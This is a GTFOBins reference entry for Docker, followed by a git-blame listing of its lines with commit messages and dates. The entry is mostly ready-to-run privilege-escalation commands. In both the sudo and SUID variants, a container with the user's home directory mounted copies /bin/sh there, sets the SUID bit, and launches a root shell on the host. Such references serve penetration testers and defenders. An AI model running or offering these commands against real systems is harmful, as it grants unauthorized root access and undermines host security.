GTFOBins.github.io/_gtfobins/docker.md

---
description: |
  Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
functions:
  sudo:
    - code: |
        sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
            sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
  suid:
    - code: |
        ./docker run --rm -v /home/$USER:/h_docs ubuntu \
            sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
---
add new ways 2018-08-17 17:16:09 +02:00			`---`
Make docker disposable, use sh instead of bash and add description 2018-08-19 09:40:37 +02:00			`description: \|`
Remove docker interactive-execute 2018-08-19 12:14:16 +02:00			Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
add new ways 2018-08-17 17:16:09 +02:00			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Make docker disposable, use sh instead of bash and add description 2018-08-19 09:40:37 +02:00			`- code: \|`
			`sudo docker run --rm -v /home/$USER:/h_docs ubuntu \`
Remove docker interactive-execute 2018-08-19 12:14:16 +02:00			`sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p`
Adopt new function names 2018-10-05 19:55:38 +02:00			`suid:`
Make docker disposable, use sh instead of bash and add description 2018-08-19 09:40:37 +02:00			`- code: \|`
			`./docker run --rm -v /home/$USER:/h_docs ubuntu \`
Remove docker interactive-execute 2018-08-19 12:14:16 +02:00			`sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p`
add new ways 2018-08-17 17:16:09 +02:00			`---`